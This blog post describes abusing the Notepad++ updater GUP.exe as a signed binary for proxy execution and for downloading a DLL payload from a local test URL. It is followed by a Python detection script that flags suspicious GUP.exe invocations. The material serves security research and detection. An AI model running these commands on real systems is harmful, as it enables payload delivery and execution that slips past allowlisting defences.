May 2, 2021 in Living off the land, LOLBins
Notepad++ ships with a built-in updater called GUP, typically located here:
c:\Program Files (x86)\Notepad++\updater\GUP.exe
It is a generic downloader that accepts a range of command line arguments, and while it is non-trivial to work out which arguments it takes and in what order to make it tick, at least two of them make for particularly interesting LOLBin use cases.
Execute via Proxy
c:\Program Files (x86)\Notepad++\updater\GUP.exe -unzipTo c:\windows\system32\calc.exe <anything> <anything>
e.g.:
c:\Program Files (x86)\Notepad++\updater\GUP.exe -unzipTo c:\windows\system32\calc.exe 1 1
will launch Calculator.
Downloader
Since it’s a downloader by design, I am not sure to what extent the definition of LOLBin can cover this use case, but since the program itself is signed, and using it to download something other than what the original author anticipated kinda ticks the box, I would say it does fulfill these requirements well.
The following command line
GUP.exe -unzipTo [program] [directory] "[name] [URL] [SHA256]"
will download the file from the URL and save it to the %TEMP% folder, before extracting it to [directory].
The %TEMP% bit always works, but if the archive doesn’t follow the expected NPP plugin structure, or your SHA256 is incorrect, you may see errors. The NPP plugin structure is trivial, e.g. the following will do:
When downloaded, it will be placed under [directory]\bar\bar.dll.
And finally the actual example:
GUP.exe -unzipTo "c:\windows\system32\notepad.exe" "C:\test" "bar http://127.0.0.1:8080/bar.zip C072B391D5FAFC13E9D84A5F3A335A08DA218B5A0130981525EC2E0E3598E76F"
from my test under Tomcat.
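For the blue-team side of both use cases above (the proxy execution via -unzipTo and the downloader), here is an added detection example that is not part of the original post or of the Notepad++ project. It runs simple heuristics over constructed process-creation records: GUP.exe whose -unzipTo target is not notepad++.exe, whose "[name] [URL] [SHA256]" argument points at a host outside an allowlist, or that was not started by notepad++.exe. The telemetry field names (image, parent, cmdline), the allowlisted hosts, and the shape of a legitimate plugin-install invocation are assumptions to be tuned per environment.

```python
"""Heuristic detection of suspicious GUP.exe (Notepad++ updater) invocations.

Added example, not part of the original post or of the Notepad++ project.
Assumptions: process-creation telemetry exposes the image path, the full
command line and the parent image (field names are assumed); legitimate
GUP.exe runs are started by notepad++.exe, point -unzipTo at notepad++.exe
itself, and fetch only from the hosts in EXPECTED_HOSTS (an assumed allowlist).
"""
import re
from typing import Dict, List
from urllib.parse import urlparse

EXPECTED_HOSTS = {"notepad-plus-plus.org", "github.com", "raw.githubusercontent.com"}
EXPECTED_PARENT = "notepad++.exe"
EXPECTED_PROGRAM = "notepad++.exe"


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted
    arguments (such as the "[name] [URL] [SHA256]" triple) as one token."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] == '"' else t for t in tokens]


def analyse(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like LOLBin abuse of GUP.exe;
    an empty list means nothing suspicious was found."""
    argv = split_cmdline(event.get("cmdline", ""))
    if not argv or not argv[0].lower().endswith("gup.exe"):
        return []
    lowered = [a.lower() for a in argv]
    if "-unzipto" not in lowered:
        return []
    i = lowered.index("-unzipto")
    program = argv[i + 1] if len(argv) > i + 1 else ""
    spec = argv[i + 3] if len(argv) > i + 3 else ""
    reasons: List[str] = []
    # Proxy execution: -unzipTo ends by launching [program]; anything other
    # than notepad++.exe is not what the updater is meant to start.
    if program and not program.lower().endswith(EXPECTED_PROGRAM):
        reasons.append(f"-unzipTo launches unexpected program: {program}")
    # Downloader: the third argument carries "[name] [URL] [SHA256]".
    url = next((p for p in spec.split() if p.lower().startswith(("http://", "https://"))), "")
    if url:
        host = (urlparse(url).hostname or "").lower()
        if host not in EXPECTED_HOSTS:
            reasons.append(f"download from unexpected host: {host}")
    parent = event.get("parent", "")
    if not parent.lower().endswith(EXPECTED_PARENT):
        reasons.append(f"GUP.exe started by unexpected parent: {parent or '<unknown>'}")
    return reasons


# Constructed sample events (not real telemetry). The first two mirror the
# command lines from the post; the third is what a plugin install launched
# from Notepad++ is assumed to look like (placeholder hash).
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files (x86)\Notepad++\updater\GUP.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files (x86)\Notepad++\updater\GUP.exe" -unzipTo c:\windows\system32\calc.exe 1 1'},
    {"image": r"C:\Program Files (x86)\Notepad++\updater\GUP.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'GUP.exe -unzipTo "c:\windows\system32\notepad.exe" "C:\test" "bar http://127.0.0.1:8080/bar.zip C072B391D5FAFC13E9D84A5F3A335A08DA218B5A0130981525EC2E0E3598E76F"'},
    {"image": r"C:\Program Files (x86)\Notepad++\updater\GUP.exe",
     "parent": r"C:\Program Files (x86)\Notepad++\notepad++.exe",
     "cmdline": r'"C:\Program Files (x86)\Notepad++\updater\GUP.exe" -unzipTo "C:\Program Files (x86)\Notepad++\notepad++.exe" "C:\Program Files (x86)\Notepad++\plugins" "ExamplePlugin https://github.com/example/ExamplePlugin/releases/download/v1.0/ExamplePlugin.zip 0000000000000000000000000000000000000000000000000000000000000000"'},
]


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each suspicious event to its list of reasons."""
    return {n: r for n, e in enumerate(events) if (r := analyse(e))}


if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {n}: " + "; ".join(reasons))
```

The parent-process check is the cheapest signal: in normal use GUP.exe is only ever spawned by notepad++.exe, so a shell, script host or Office process as parent is worth an alert on its own. The host allowlist will need adjusting to wherever a given deployment actually pulls updates and plugins from.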